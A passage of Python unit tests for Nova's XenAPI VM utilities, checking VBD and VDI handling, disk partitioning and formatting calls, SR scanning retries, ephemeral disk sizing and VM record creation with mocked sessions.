def setUp(self):
super(BittorrentTestCase, self).setUp()
self.context = context.get_admin_context()
def test_image_uses_bittorrent(self):
instance = {'system_metadata': {'image_bittorrent': True}}
self.flags(torrent_images='some', group='xenserver')
self.assertTrue(vm_utils._image_uses_bittorrent(self.context,
instance))
def _test_create_image(self, cache_type):
instance = {'system_metadata': {'image_cache_in_nova': True}}
self.flags(cache_images=cache_type, group='xenserver')
was = {'called': None}
def fake_create_cached_image(*args):
was['called'] = 'some'
return {}
self.stubs.Set(vm_utils, '_create_cached_image',
fake_create_cached_image)
def fake_fetch_image(*args):
was['called'] = 'none'
return {}
self.stubs.Set(vm_utils, '_fetch_image',
fake_fetch_image)
vm_utils._create_image(self.context, None, instance,
'foo', 'bar', 'baz')
self.assertEqual(was['called'], cache_type)
def test_create_image_cached(self):
self._test_create_image('some')
def test_create_image_uncached(self):
self._test_create_image('none')
class ShutdownTestCase(VMUtilsTestBase):
def test_hardshutdown_should_return_true_when_vm_is_shutdown(self):
self.mock = mox.Mox()
session = FakeSession()
instance = "instance"
vm_ref = "vm-ref"
self.mock.StubOutWithMock(vm_utils, 'is_vm_shutdown')
vm_utils.is_vm_shutdown(session, vm_ref).AndReturn(True)
self.mock.StubOutWithMock(vm_utils, 'LOG')
self.assertTrue(vm_utils.hard_shutdown_vm(
session, instance, vm_ref))
def test_cleanshutdown_should_return_true_when_vm_is_shutdown(self):
self.mock = mox.Mox()
session = FakeSession()
instance = "instance"
vm_ref = "vm-ref"
self.mock.StubOutWithMock(vm_utils, 'is_vm_shutdown')
vm_utils.is_vm_shutdown(session, vm_ref).AndReturn(True)
self.mock.StubOutWithMock(vm_utils, 'LOG')
self.assertTrue(vm_utils.clean_shutdown_vm(
session, instance, vm_ref))
class CreateVBDTestCase(VMUtilsTestBase):
def setUp(self):
super(CreateVBDTestCase, self).setUp()
self.session = FakeSession()
self.mock = mox.Mox()
self.mock.StubOutWithMock(self.session, 'call_xenapi')
self.vbd_rec = self._generate_vbd_rec()
def _generate_vbd_rec(self):
vbd_rec = {}
vbd_rec['VM'] = 'vm_ref'
vbd_rec['VDI'] = 'vdi_ref'
vbd_rec['userdevice'] = '0'
vbd_rec['bootable'] = False
vbd_rec['mode'] = 'RW'
vbd_rec['type'] = 'disk'
vbd_rec['unpluggable'] = True
vbd_rec['empty'] = False
vbd_rec['other_config'] = {}
vbd_rec['qos_algorithm_type'] = ''
vbd_rec['qos_algorithm_params'] = {}
vbd_rec['qos_supported_algorithms'] = []
return vbd_rec
def test_create_vbd_default_args(self):
self.session.call_xenapi('VBD.create',
self.vbd_rec).AndReturn("vbd_ref")
self.mock.ReplayAll()
result = vm_utils.create_vbd(self.session, "vm_ref", "vdi_ref", 0)
self.assertEqual(result, "vbd_ref")
self.mock.VerifyAll()
def test_create_vbd_osvol(self):
self.session.call_xenapi('VBD.create',
self.vbd_rec).AndReturn("vbd_ref")
self.session.call_xenapi('VBD.add_to_other_config', "vbd_ref",
"osvol", "True")
self.mock.ReplayAll()
result = vm_utils.create_vbd(self.session, "vm_ref", "vdi_ref", 0,
osvol=True)
self.assertEqual(result, "vbd_ref")
self.mock.VerifyAll()
def test_create_vbd_extra_args(self):
self.vbd_rec['VDI'] = 'OpaqueRef:NULL'
self.vbd_rec['type'] = 'a'
self.vbd_rec['mode'] = 'RO'
self.vbd_rec['bootable'] = True
self.vbd_rec['empty'] = True
self.vbd_rec['unpluggable'] = False
self.session.call_xenapi('VBD.create',
self.vbd_rec).AndReturn("vbd_ref")
self.mock.ReplayAll()
result = vm_utils.create_vbd(self.session, "vm_ref", None, 0,
vbd_type="a", read_only=True, bootable=True,
empty=True, unpluggable=False)
self.assertEqual(result, "vbd_ref")
self.mock.VerifyAll()
def test_attach_cd(self):
self.mock.StubOutWithMock(vm_utils, 'create_vbd')
vm_utils.create_vbd(self.session, "vm_ref", None, 1,
vbd_type='cd', read_only=True, bootable=True,
empty=True, unpluggable=False).AndReturn("vbd_ref")
self.session.call_xenapi('VBD.insert', "vbd_ref", "vdi_ref")
self.mock.ReplayAll()
result = vm_utils.attach_cd(self.session, "vm_ref", "vdi_ref", 1)
self.assertEqual(result, "vbd_ref")
self.mock.VerifyAll()
class UnplugVbdTestCase(VMUtilsTestBase):
@mock.patch.object(greenthread, 'sleep')
def test_unplug_vbd_works(self, mock_sleep):
session = mock.Mock()
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
vm_utils.unplug_vbd(session, vbd_ref, vm_ref)
session.call_xenapi.assert_called_once_with('VBD.unplug', vbd_ref)
self.assertEqual(0, mock_sleep.call_count)
def test_unplug_vbd_raises_unexpected_error(self):
session = mock.Mock()
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
session.call_xenapi.side_effect = test.TestingException()
self.assertRaises(test.TestingException, vm_utils.unplug_vbd,
session, vm_ref, vbd_ref)
self.assertEqual(1, session.call_xenapi.call_count)
def test_unplug_vbd_already_detached_works(self):
error = "DEVICE_ALREADY_DETACHED"
session = _get_fake_session_and_exception(error)
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
vm_utils.unplug_vbd(session, vbd_ref, vm_ref)
self.assertEqual(1, session.call_xenapi.call_count)
def test_unplug_vbd_already_raises_unexpected_xenapi_error(self):
session = _get_fake_session_and_exception("")
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
self.assertRaises(volume_utils.StorageError, vm_utils.unplug_vbd,
session, vbd_ref, vm_ref)
self.assertEqual(1, session.call_xenapi.call_count)
def _test_uplug_vbd_retries(self, mock_sleep, error):
session = _get_fake_session_and_exception(error)
vbd_ref = "vbd_ref"
vm_ref = 'vm_ref'
self.assertRaises(volume_utils.StorageError, vm_utils.unplug_vbd,
session, vm_ref, vbd_ref)
self.assertEqual(11, session.call_xenapi.call_count)
self.assertEqual(10, mock_sleep.call_count)
@mock.patch.object(greenthread, 'sleep')
def test_uplug_vbd_retries_on_rejected(self, mock_sleep):
self._test_uplug_vbd_retries(mock_sleep,
"DEVICE_DETACH_REJECTED")
@mock.patch.object(greenthread, 'sleep')
def test_uplug_vbd_retries_on_internal_error(self, mock_sleep):
self._test_uplug_vbd_retries(mock_sleep,
"INTERNAL_ERROR")
class VDIOtherConfigTestCase(VMUtilsTestBase):
"""Tests to ensure that the code is populating VDI's `other_config`
attribute with the correct metadta.
"""
def setUp(self):
super(VDIOtherConfigTestCase, self).setUp()
class _FakeSession():
def call_xenapi(self, operation, *args, **kwargs):
# VDI.add_to_other_config -> VDI_add_to_other_config
method = getattr(self, operation.replace('.', '_'), None)
if method:
return method(*args, **kwargs)
self.operation = operation
self.args = args
self.kwargs = kwargs
self.session = _FakeSession()
self.context = context.get_admin_context()
self.fake_instance = {'uuid': 'aaaa-bbbb-cccc-dddd',
'name': 'myinstance'}
def test_create_vdi(self):
# Some images are registered with XenServer explicitly by calling
# `create_vdi`
vm_utils.create_vdi(self.session, 'sr_ref', self.fake_instance,
'myvdi', 'root', 1024, read_only=True)
expected = {'nova_disk_type': 'root',
'nova_instance_uuid': 'aaaa-bbbb-cccc-dddd'}
self.assertEqual(expected, self.session.args[0]['other_config'])
def test_create_image(self):
# Other images are registered implicitly when they are dropped into
# the SR by a dom0 plugin or some other process
self.flags(cache_images='none', group='xenserver')
def fake_fetch_image(*args):
return {'root': {'uuid': 'fake-uuid'}}
self.stubs.Set(vm_utils, '_fetch_image', fake_fetch_image)
other_config = {}
def VDI_add_to_other_config(ref, key, value):
other_config[key] = value
def VDI_get_record(ref):
return {'other_config': {}}
# Stubbing on the session object and not class so we don't pollute
# other tests
self.session.VDI_add_to_other_config = VDI_add_to_other_config
self.session.VDI_get_record = VDI_get_record
vm_utils._create_image(self.context, self.session, self.fake_instance,
'myvdi', 'image1', vm_utils.ImageType.DISK_VHD)
expected = {'nova_disk_type': 'root',
'nova_instance_uuid': 'aaaa-bbbb-cccc-dddd'}
self.assertEqual(expected, other_config)
def test_import_migrated_vhds(self):
# Migrated images should preserve the `other_config`
other_config = {}
def VDI_add_to_other_config(ref, key, value):
other_config[key] = value
def VDI_get_record(ref):
return {'other_config': {}}
def call_plugin_serialized(*args, **kwargs):
return {'root': {'uuid': 'aaaa-bbbb-cccc-dddd'}}
# Stubbing on the session object and not class so we don't pollute
# other tests
self.session.VDI_add_to_other_config = VDI_add_to_other_config
self.session.VDI_get_record = VDI_get_record
self.session.call_plugin_serialized = call_plugin_serialized
self.stubs.Set(vm_utils, 'get_sr_path', lambda *a, **k: None)
self.stubs.Set(vm_utils, 'scan_default_sr', lambda *a, **k: None)
vm_utils._import_migrated_vhds(self.session, self.fake_instance,
"disk_label", "root", "vdi_label")
expected = {'nova_disk_type': 'root',
'nova_instance_uuid': 'aaaa-bbbb-cccc-dddd'}
self.assertEqual(expected, other_config)
class GenerateDiskTestCase(VMUtilsTestBase):
def setUp(self):
super(GenerateDiskTestCase, self).setUp()
self.flags(disable_process_locking=True,
instance_name_template='%d',
firewall_driver='nova.virt.xenapi.firewall.'
'Dom0IptablesFirewallDriver')
self.flags(connection_url='test_url',
connection_password='test_pass',
group='xenserver')
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
self.session = driver._session
self.session.is_local_connection = False
self.vm_ref = fake.create_vm("foo", "Running")
def tearDown(self):
super(GenerateDiskTestCase, self).tearDown()
fake.destroy_vm(self.vm_ref)
def _expect_parted_calls(self):
self.mox.StubOutWithMock(utils, "execute")
self.mox.StubOutWithMock(utils, "trycmd")
self.mox.StubOutWithMock(vm_utils, "destroy_vdi")
self.mox.StubOutWithMock(vm_utils.os.path, "exists")
if self.session.is_local_connection:
utils.execute('parted', '--script', '/dev/fakedev', 'mklabel',
'msdos', check_exit_code=False, run_as_root=True)
utils.execute('parted', '--script', '/dev/fakedev', '--', 'mkpart',
'primary', '0', '-0',
check_exit_code=False, run_as_root=True)
vm_utils.os.path.exists('/dev/mapper/fakedev1').AndReturn(True)
utils.trycmd('kpartx', '-a', '/dev/fakedev',
discard_warnings=True, run_as_root=True)
else:
utils.execute('parted', '--script', '/dev/fakedev', 'mklabel',
'msdos', check_exit_code=True, run_as_root=True)
utils.execute('parted', '--script', '/dev/fakedev', '--', 'mkpart',
'primary', '0', '-0',
check_exit_code=True, run_as_root=True)
def _check_vdi(self, vdi_ref, check_attached=True):
vdi_rec = self.session.call_xenapi("VDI.get_record", vdi_ref)
self.assertEqual(str(10 * unit.Mi), vdi_rec["virtual_size"])
if check_attached:
vbd_ref = vdi_rec["VBDs"][0]
vbd_rec = self.session.call_xenapi("VBD.get_record", vbd_ref)
self.assertEqual(self.vm_ref, vbd_rec['VM'])
else:
self.assertEqual(0, len(vdi_rec["VBDs"]))
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_with_no_fs_given(self):
self._expect_parted_calls()
self.mox.ReplayAll()
vdi_ref = vm_utils._generate_disk(self.session, {"uuid": "fake_uuid"},
self.vm_ref, "2", "name", "user", 10, None)
self._check_vdi(vdi_ref)
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_swap(self):
self._expect_parted_calls()
utils.execute('mkswap', '/dev/fakedev1', run_as_root=True)
self.mox.ReplayAll()
vdi_ref = vm_utils._generate_disk(self.session, {"uuid": "fake_uuid"},
self.vm_ref, "2", "name", "swap", 10, "linux-swap")
self._check_vdi(vdi_ref)
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_ephemeral(self):
self._expect_parted_calls()
utils.execute('mkfs', '-t', 'ext4', '/dev/fakedev1',
run_as_root=True)
self.mox.ReplayAll()
vdi_ref = vm_utils._generate_disk(self.session, {"uuid": "fake_uuid"},
self.vm_ref, "2", "name", "ephemeral", 10, "ext4")
self._check_vdi(vdi_ref)
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_ensure_cleanup_called(self):
self._expect_parted_calls()
utils.execute('mkfs', '-t', 'ext4', '/dev/fakedev1',
run_as_root=True).AndRaise(test.TestingException)
vm_utils.destroy_vdi(self.session, mox.IgnoreArg())
self.mox.ReplayAll()
self.assertRaises(test.TestingException, vm_utils._generate_disk,
self.session, {"uuid": "fake_uuid"},
self.vm_ref, "2", "name", "ephemeral", 10, "ext4")
@test_xenapi.stub_vm_utils_with_vdi_attached_here
def test_generate_disk_ephemeral_local_not_attached(self):
self.session.is_local_connection = True
self._expect_parted_calls()
utils.execute('mkfs', '-t', 'ext4', '/dev/mapper/fakedev1',
run_as_root=True)
self.mox.ReplayAll()
vdi_ref = vm_utils._generate_disk(self.session, {"uuid": "fake_uuid"},
None, "2", "name", "ephemeral", 10, "ext4")
self._check_vdi(vdi_ref, check_attached=False)
class GenerateEphemeralTestCase(VMUtilsTestBase):
def setUp(self):
super(GenerateEphemeralTestCase, self).setUp()
self.session = "session"
self.instance = "instance"
self.vm_ref = "vm_ref"
self.name_label = "name"
self.ephemeral_name_label = "name ephemeral"
self.userdevice = 4
self.mox.StubOutWithMock(vm_utils, "_generate_disk")
self.mox.StubOutWithMock(vm_utils, "safe_destroy_vdis")
def test_get_ephemeral_disk_sizes_simple(self):
result = vm_utils.get_ephemeral_disk_sizes(20)
expected = [20]
self.assertEqual(expected, list(result))
def test_get_ephemeral_disk_sizes_three_disks_2000(self):
result = vm_utils.get_ephemeral_disk_sizes(4030)
expected = [2000, 2000, 30]
self.assertEqual(expected, list(result))
def test_get_ephemeral_disk_sizes_two_disks_1024(self):
result = vm_utils.get_ephemeral_disk_sizes(2048)
expected = [1024, 1024]
self.assertEqual(expected, list(result))
def _expect_generate_disk(self, size, device, name_label):
vm_utils._generate_disk(self.session, self.instance, self.vm_ref,
str(device), name_label, 'ephemeral',
size * 1024, None).AndReturn(device)
def test_generate_ephemeral_adds_one_disk(self):
self._expect_generate_disk(20, self.userdevice,
self.ephemeral_name_label)
self.mox.ReplayAll()
vm_utils.generate_ephemeral(self.session, self.instance, self.vm_ref,
str(self.userdevice), self.name_label, 20)
def test_generate_ephemeral_adds_multiple_disks(self):
self._expect_generate_disk(2000, self.userdevice,
self.ephemeral_name_label)
self._expect_generate_disk(2000, self.userdevice + 1,
self.ephemeral_name_label + " (1)")
self._expect_generate_disk(30, self.userdevice + 2,
self.ephemeral_name_label + " (2)")
self.mox.ReplayAll()
vm_utils.generate_ephemeral(self.session, self.instance, self.vm_ref,
str(self.userdevice), self.name_label, 4030)
def test_generate_ephemeral_cleans_up_on_error(self):
self._expect_generate_disk(1024, self.userdevice,
self.ephemeral_name_label)
self._expect_generate_disk(1024, self.userdevice + 1,
self.ephemeral_name_label + " (1)")
vm_utils._generate_disk(self.session, self.instance, self.vm_ref,
str(self.userdevice + 2), "name ephemeral (2)", 'ephemeral',
unit.Mi, None).AndRaise(exception.NovaException)
vm_utils.safe_destroy_vdis(self.session, [4, 5])
self.mox.ReplayAll()
self.assertRaises(exception.NovaException, vm_utils.generate_ephemeral,
self.session, self.instance, self.vm_ref,
str(self.userdevice), self.name_label, 4096)
class FakeFile(object):
def __init__(self):
self._file_operations = []
def seek(self, offset):
self._file_operations.append((self.seek, offset))
class StreamDiskTestCase(VMUtilsTestBase):
def setUp(self):
import __builtin__
super(StreamDiskTestCase, self).setUp()
self.mox.StubOutWithMock(vm_utils.utils, 'make_dev_path')
self.mox.StubOutWithMock(vm_utils.utils, 'temporary_chown')
self.mox.StubOutWithMock(vm_utils, '_write_partition')
# NOTE(matelakat): This might hide the fail reason, as test runners
# are unhappy with a mocked out open.
self.mox.StubOutWithMock(__builtin__, 'open')
self.image_service_func = self.mox.CreateMockAnything()
def test_non_ami(self):
fake_file = FakeFile()
vm_utils.utils.make_dev_path('dev').AndReturn('some_path')
vm_utils.utils.temporary_chown(
'some_path').AndReturn(contextified(None))
open('some_path', 'wb').AndReturn(contextified(fake_file))
self.image_service_func(fake_file)
self.mox.ReplayAll()
vm_utils._stream_disk("session", self.image_service_func,
vm_utils.ImageType.KERNEL, None, 'dev')
self.assertEqual([(fake_file.seek, 0)], fake_file._file_operations)
def test_ami_disk(self):
fake_file = FakeFile()
vm_utils._write_partition("session", 100, 'dev')
vm_utils.utils.make_dev_path('dev').AndReturn('some_path')
vm_utils.utils.temporary_chown(
'some_path').AndReturn(contextified(None))
open('some_path', 'wb').AndReturn(contextified(fake_file))
self.image_service_func(fake_file)
self.mox.ReplayAll()
vm_utils._stream_disk("session", self.image_service_func,
vm_utils.ImageType.DISK, 100, 'dev')
self.assertEqual(
[(fake_file.seek, vm_utils.MBR_SIZE_BYTES)],
fake_file._file_operations)
class VMUtilsSRPath(VMUtilsTestBase):
def setUp(self):
super(VMUtilsSRPath, self).setUp()
self.flags(disable_process_locking=True,
instance_name_template='%d',
firewall_driver='nova.virt.xenapi.firewall.'
'Dom0IptablesFirewallDriver')
self.flags(connection_url='test_url',
connection_password='test_pass',
group='xenserver')
stubs.stubout_session(self.stubs, fake.SessionBase)
driver = xenapi_conn.XenAPIDriver(False)
self.session = driver._session
self.session.is_local_connection = False
def test_defined(self):
self.mox.StubOutWithMock(vm_utils, "safe_find_sr")
self.mox.StubOutWithMock(self.session, "call_xenapi")
vm_utils.safe_find_sr(self.session).AndReturn("sr_ref")
self.session.host_ref = "host_ref"
self.session.call_xenapi('PBD.get_all_records_where',
'field "host"="host_ref" and field "SR"="sr_ref"').AndReturn(
{'pbd_ref': {'device_config': {'path': 'sr_path'}}})
self.mox.ReplayAll()
self.assertEqual(vm_utils.get_sr_path(self.session), "sr_path")
def test_default(self):
self.mox.StubOutWithMock(vm_utils, "safe_find_sr")
self.mox.StubOutWithMock(self.session, "call_xenapi")
vm_utils.safe_find_sr(self.session).AndReturn("sr_ref")
self.session.host_ref = "host_ref"
self.session.call_xenapi('PBD.get_all_records_where',
'field "host"="host_ref" and field "SR"="sr_ref"').AndReturn(
{'pbd_ref': {'device_config': {}}})
self.session.call_xenapi("SR.get_record", "sr_ref").AndReturn(
{'uuid': 'sr_uuid', 'type': 'ext'})
self.mox.ReplayAll()
self.assertEqual(vm_utils.get_sr_path(self.session),
"/var/run/sr-mount/sr_uuid")
class CreateKernelRamdiskTestCase(VMUtilsTestBase):
def setUp(self):
super(CreateKernelRamdiskTestCase, self).setUp()
self.context = "context"
self.session = FakeSession()
self.instance = {"kernel_id": None, "ramdisk_id": None}
self.name_label = "name"
self.mox.StubOutWithMock(self.session, "call_plugin")
self.mox.StubOutWithMock(uuid, "uuid4")
self.mox.StubOutWithMock(vm_utils, "_fetch_disk_image")
def test_create_kernel_and_ramdisk_no_create(self):
self.mox.ReplayAll()
result = vm_utils.create_kernel_and_ramdisk(self.context,
self.session, self.instance, self.name_label)
self.assertEqual((None, None), result)
def test_create_kernel_and_ramdisk_create_both_cached(self):
kernel_id = "kernel"
ramdisk_id = "ramdisk"
self.instance["kernel_id"] = kernel_id
self.instance["ramdisk_id"] = ramdisk_id
args_kernel = {}
args_kernel['cached-image'] = kernel_id
args_kernel['new-image-uuid'] = "fake_uuid1"
uuid.uuid4().AndReturn("fake_uuid1")
self.session.call_plugin('kernel', 'create_kernel_ramdisk',
args_kernel).AndReturn("k")
args_ramdisk = {}
args_ramdisk['cached-image'] = ramdisk_id
args_ramdisk['new-image-uuid'] = "fake_uuid2"
uuid.uuid4().AndReturn("fake_uuid2")
self.session.call_plugin('kernel', 'create_kernel_ramdisk',
args_ramdisk).AndReturn("r")
self.mox.ReplayAll()
result = vm_utils.create_kernel_and_ramdisk(self.context,
self.session, self.instance, self.name_label)
self.assertEqual(("k", "r"), result)
def test_create_kernel_and_ramdisk_create_kernel_not_cached(self):
kernel_id = "kernel"
self.instance["kernel_id"] = kernel_id
args_kernel = {}
args_kernel['cached-image'] = kernel_id
args_kernel['new-image-uuid'] = "fake_uuid1"
uuid.uuid4().AndReturn("fake_uuid1")
self.session.call_plugin('kernel', 'create_kernel_ramdisk',
args_kernel).AndReturn("")
kernel = {"kernel": {"file": "k"}}
vm_utils._fetch_disk_image(self.context, self.session, self.instance,
self.name_label, kernel_id, 0).AndReturn(kernel)
self.mox.ReplayAll()
result = vm_utils.create_kernel_and_ramdisk(self.context,
self.session, self.instance, self.name_label)
self.assertEqual(("k", None), result)
class ScanSrTestCase(VMUtilsTestBase):
@mock.patch.object(vm_utils, "_scan_sr")
@mock.patch.object(vm_utils, "safe_find_sr")
def test_scan_default_sr(self, mock_safe_find_sr, mock_scan_sr):
mock_safe_find_sr.return_value = "sr_ref"
self.assertEqual("sr_ref", vm_utils.scan_default_sr("fake_session"))
mock_scan_sr.assert_called_once_with("fake_session", "sr_ref")
def test_scan_sr_works(self):
session = mock.Mock()
vm_utils._scan_sr(session, "sr_ref")
session.call_xenapi.assert_called_once_with('SR.scan', "sr_ref")
def test_scan_sr_unknown_error_fails_once(self):
session = mock.Mock()
session.call_xenapi.side_effect = test.TestingException
self.assertRaises(test.TestingException,
vm_utils._scan_sr, session, "sr_ref")
session.call_xenapi.assert_called_once_with('SR.scan', "sr_ref")
@mock.patch.object(greenthread, 'sleep')
def test_scan_sr_known_error_retries_then_throws(self, mock_sleep):
session = mock.Mock()
class FakeException(Exception):
details = ['SR_BACKEND_FAILURE_40', "", "", ""]
session.XenAPI.Failure = FakeException
session.call_xenapi.side_effect = FakeException
self.assertRaises(FakeException,
vm_utils._scan_sr, session, "sr_ref")
session.call_xenapi.assert_called_with('SR.scan', "sr_ref")
self.assertEqual(4, session.call_xenapi.call_count)
mock_sleep.assert_has_calls([mock.call(2), mock.call(4), mock.call(8)])
@mock.patch.object(greenthread, 'sleep')
def test_scan_sr_known_error_retries_then_succeeds(self, mock_sleep):
session = mock.Mock()
class FakeException(Exception):
details = ['SR_BACKEND_FAILURE_40', "", "", ""]
session.XenAPI.Failure = FakeException
sr_scan_call_count = 0
def fake_call_xenapi(*args):
fake_call_xenapi.count += 1
if fake_call_xenapi.count != 2:
raise FakeException()
fake_call_xenapi.count = 0
session.call_xenapi.side_effect = fake_call_xenapi
vm_utils._scan_sr(session, "sr_ref")
session.call_xenapi.assert_called_with('SR.scan', "sr_ref")
self.assertEqual(2, session.call_xenapi.call_count)
mock_sleep.assert_called_once_with(2)
@mock.patch.object(flavors, 'extract_flavor',
return_value={
'memory_mb': 1024,
'vcpus': 1,
'vcpu_weight': 1.0,
})
class CreateVmTestCase(VMUtilsTestBase):
def test_vss_provider(self, mock_extract):
self.flags(vcpu_pin_set="2,3")
session = mock.Mock()
instance = {
"uuid": "uuid",
}
vm_utils.create_vm(session, instance, "label",
"kernel", "ramdisk")
vm_rec = {
'VCPUs_params': {'cap': '0', 'mask': '2,3', 'weight': '1.0'},
'PV_args': '',
'memory_static_min': '0',
'ha_restart_priority': '',
'HVM_boot_policy': 'BIOS order',
'PV_bootloader': '', 'tags': [],
'VCPUs_max': '1',
'memory_static_max': '1073741824',
'actions_after_shutdown': 'destroy',
'memory_dynamic_max': '1073741824',
'user_version': '0',
'xenstore_data': {'vm-data/allowvssprovider': 'false'},
'blocked_operations': {},
'is_a_template': False,
'name_description': '',
'memory_dynamic_min': '1073741824',
'actions_after_crash': 'destroy',
'memory_target': '1073741824',
'PV_ramdisk': '',
'PV_bootloader_args': '',
'PCI_bus': '',
'other_config': {'nova_uuid': 'uuid'},
'name_label': 'label',
'actions_after_reboot': 'restart',
'VCPUs_at_startup': '1',
'HVM_boot_params': {'order': 'dc'},
'platform': {'nx': 'true', 'pae': 'true', 'apic': 'true',
'timeoffset': '0', 'viridian': 'true',
'acpi': 'true'},
'PV_legacy_args': '',
'PV_kernel': '',
'affinity': '',
'recommendations': '',
'ha_always_run': False
}
session.call_xenapi.assert_called_once_with("VM.create", vm_rec)
def test_invalid_cpu_mask_raises(self, mock_extract):
self.flags(vcpu_pin_set="asdf")
session = mock.Mock()
instance = {
"uuid": "uuid",
}
self.assertRaises(exception.Invalid,
vm_utils.create_vm,
session, instance, "label",
"kernel", "ramdisk")
class DetermineVmModeTestCase(VMUtilsTestBase):
def test_determine_vm_mode_returns_xen_mode(self):
instance = {"vm_mode": "xen"}
self.assertEqual(vm_mode.XEN,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_hvm_mode(self):
instance = {"vm_mode": "hvm"}
self.assertEqual(vm_mode.HVM,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_xen_for_linux(self):
instance = {"vm_mode": None, "os_type": "linux"}
self.assertEqual(vm_mode.XEN,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_hvm_for_windows(self):
instance = {"vm_mode": None, "os_type": "windows"}
self.assertEqual(vm_mode.HVM,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_hvm_by_default(self):
instance = {"vm_mode": None, "os_type": None}
self.assertEqual(vm_mode.HVM,
vm_utils.determine_vm_mode(instance, None))
def test_determine_vm_mode_returns_xen_for_VHD(self):
instance = {"vm_mode": None, "os_type": None}
self.assertEqual(vm_mode.XEN,
vm_utils.determine_vm_mode(instance, vm_utils.ImageType.DISK_VHD))
def test_determine_vm_mode_returns_xen_for_DISK(self):
instance = {"vm_mode": None, "os_type": None}
self.assertEqual(vm_mode.XEN,
vm_utils.determine_vm_mode(instance, vm_utils.ImageType.DISK))
class CallXenAPIHelpersTestCase(VMUtilsTestBase):
def test_vm_get_vbd_refs(self):
session = mock.Mock()
session.call_xenapi.return_value = "foo"
self.assertEqual("foo", vm_utils._vm_get_vbd_refs(session, "vm_ref"))
session.call_xenapi.assert_called_once_with("VM.get_VBDs", "vm_ref")
def test_vbd_get_rec(self):
session = mock.Mock()
session.call_xenapi.return_value = "foo"
self.assertEqual("foo", vm_utils._vbd_get_rec(session, "vbd_ref"))
session.call_xenapi.assert_called_once_with("VBD.get_record",
"vbd_ref")
def test_vdi_get_rec(self):
session = mock.Mock()
session.call_xenapi.return_value = "foo"
self.assertEqual("foo", vm_utils._vdi_get_rec(session, "vdi_ref"))
session.call_xenapi.assert_called_once_with("VDI.get_record",
"vdi_ref")
def test_vdi_snapshot(self):
session = mock.Mock()
session.call_xenapi.return_value = "foo"
self.assertEqual("foo", vm_utils._vdi_snapshot(session, "vdi_ref"))
session.call_xenapi.assert_called_once_with("VDI.snapshot",
"vdi_ref", {})
def test_vdi_get_virtual_size(self):
session = mock.Mock()
session.call_xenapi.return_value = "123"
self.assertEqual(123, vm_utils._vdi_get_virtual_size(session, "ref"))
session.call_xenapi.assert_called_once_with("VDI.get_virtual_size",
"ref")
@mock.patch.object(vm_utils, '_get_resize_func_name')
def test_vdi_resize(self, mock_get_resize_func_name):
session = mock.Mock()
mock_get_resize_func_name.return_value = "VDI.fake"
vm_utils._vdi_resize(session, "ref", 123)
session.call_xenapi.assert_called_once_with("VDI.fake", "ref", "123")
@mock.patch.object(vm_utils, '_vdi_resize')
@mock.patch.object(vm_utils, '_vdi_get_virtual_size')
def test_update_vdi_virtual_size_works(self, mock_get_size, mock_resize):
mock_get_size.return_value = (1024 ** 3) - 1
instance = {"uuid": "a"}
vm_utils.update_vdi_virtual_size("s", instance, "ref", 1)
mock_get_size.assert_called_once_with("s", "ref")
mock_resize.assert_called_once_with("s", "ref", 1024 ** 3)
@mock.patch.object(vm_utils, '_vdi_resize')
@mock.patch.object(vm_utils, '_vdi_get_virtual_size')
def test_update_vdi_virtual_size_skips_resize_down(self, mock_get_size,
mock_resize):
mock_get_size.return_value = 1024 ** 3
instance = {"uuid": "a"}
vm_utils.update_vdi_virtual_size("s", instance, "ref", 1)
mock_get_size.assert_called_once_with("s", "ref")
self.assertFalse(mock_resize.called)
@mock.patch.object(vm_utils, '_vdi_resize')
@mock.patch.object(vm_utils, '_vdi_get_virtual_size')
def test_update_vdi_virtual_size_raise_if_disk_big(self, mock_get_size,
mock_resize):
mock_get_size.return_value = 1024 ** 3 + 1
instance = {"uuid": "a"}
self.assertRaises(exception.ResizeError,
vm_utils.update_vdi_virtual_size,
"s", instance, "ref", 1)
mock_get_size.assert_called_once_with("s", "ref")
self.assertFalse(mock_resize.called)
@mock.patch.object(vm_utils, '_vdi_get_rec')
@mock.patch.object(vm_utils, '_vbd_get_rec')
@mock.patch.object(vm_utils, '_vm_get_vbd_refs')
class GetVdiForVMTestCase(VMUtilsTestBase):
def test_get_vdi_for_vm_safely(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_rec):
session = "session"
vm_get_vbd_refs.return_value = ["a", "b"]
vbd_get_rec.return_value = {'userdevice': '0', 'VDI': 'vdi_ref'}
vdi_get_rec.return_value = {}
result = vm_utils.get_vdi_for_vm_safely(session, "vm_ref")
self.assertEqual(('vdi_ref', {}), result)
vm_get_vbd_refs.assert_called_once_with(session, "vm_ref")
vbd_get_rec.assert_called_once_with(session, "a")
vdi_get_rec.assert_called_once_with(session, "vdi_ref")
def test_get_vdi_for_vm_safely_fails(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_rec):
session = "session"
vm_get_vbd_refs.return_value = ["a", "b"]
vbd_get_rec.return_value = {'userdevice': '0', 'VDI': 'vdi_ref'}
self.assertRaises(exception.NovaException,
vm_utils.get_vdi_for_vm_safely,
session, "vm_ref", userdevice='1')
self.assertEqual([], vdi_get_rec.call_args_list)
self.assertEqual(2, len(vbd_get_rec.call_args_list))
@mock.patch.object(vm_utils, '_vdi_get_uuid')
@mock.patch.object(vm_utils, '_vbd_get_rec')
@mock.patch.object(vm_utils, '_vm_get_vbd_refs')
class GetAllVdiForVMTestCase(VMUtilsTestBase):
def _setup_get_all_vdi_uuids_for_vm(self, vm_get_vbd_refs,
vbd_get_rec, vdi_get_uuid):
def fake_vbd_get_rec(session, vbd_ref):
return {'userdevice': vbd_ref, 'VDI': "vdi_ref_%s" % vbd_ref}
def fake_vdi_get_uuid(session, vdi_ref):
return vdi_ref
vm_get_vbd_refs.return_value = ["0", "2"]
